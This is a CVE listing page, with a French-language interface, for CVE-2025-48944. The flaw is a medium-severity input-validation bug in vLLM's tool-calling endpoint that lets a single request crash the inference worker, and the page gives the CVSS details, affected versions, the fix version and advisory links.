← Retour aux CVEs
CVE-2025-48944
MEDIUM6.5
Description
vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue.
Details CVE
Score CVSS v3.16.5
SeveriteMEDIUM
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Vecteur d'attaqueNETWORK
ComplexiteLOW
Privileges requisLOW
Interaction utilisateurNONE
Publie5/30/2025
Derniere modification7/1/2025
Sourcenvd
Observations honeypot0
Produits affectes
vllm:vllm
Faiblesses (CWE)
CWE-20
References
https://github.com/vllm-project/vllm/pull/17623(security-advisories@github.com)
https://github.com/vllm-project/vllm/security/advisories/GHSA-vrq3-r879-7m65(security-advisories@github.com)
Correlations IOC
Aucune correlation enregistree
This product uses data from the NVD API but is not endorsed or certified by the NVD.